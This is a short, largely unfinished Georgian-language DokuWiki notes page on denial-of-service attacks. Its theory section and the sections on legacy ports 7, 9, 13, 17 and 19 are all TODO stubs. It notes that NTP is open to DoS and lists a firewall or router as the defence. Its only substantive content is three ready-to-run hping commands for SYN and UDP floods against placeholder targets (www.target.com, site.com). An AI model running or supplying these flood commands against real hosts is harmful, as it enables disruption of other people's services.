თეორია

TODO

პრაქტიკა

პორტი 7 (Echo)

TODO

პორტი 9 (Discard)

TODO

პორტი 13 (Daytime)

TODO

პორტი 17 (Quote of the Day)

TODO

პორტი 19 (Character Generator)

TODO

NTP

ამ პროტოკოლის სერვისის წინააღმდეგ DoS ატაკა არის შესაძლო.

დაცვა :ფაირვოლი და/ან როუტერი

Syn Flood

hping -i u1 -S -p 80 www.target.com

ან

hping2 site.com -p 80 -i u30000 -S

UDP Flood

hping3 site.com -p 80 -i u30000 --udp
ქსელი/dos.txt · Last modified: 2011/09/25 14:14 by dzvelivereli
Back to top
Public Domain
chimeric.de = chi`s home Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0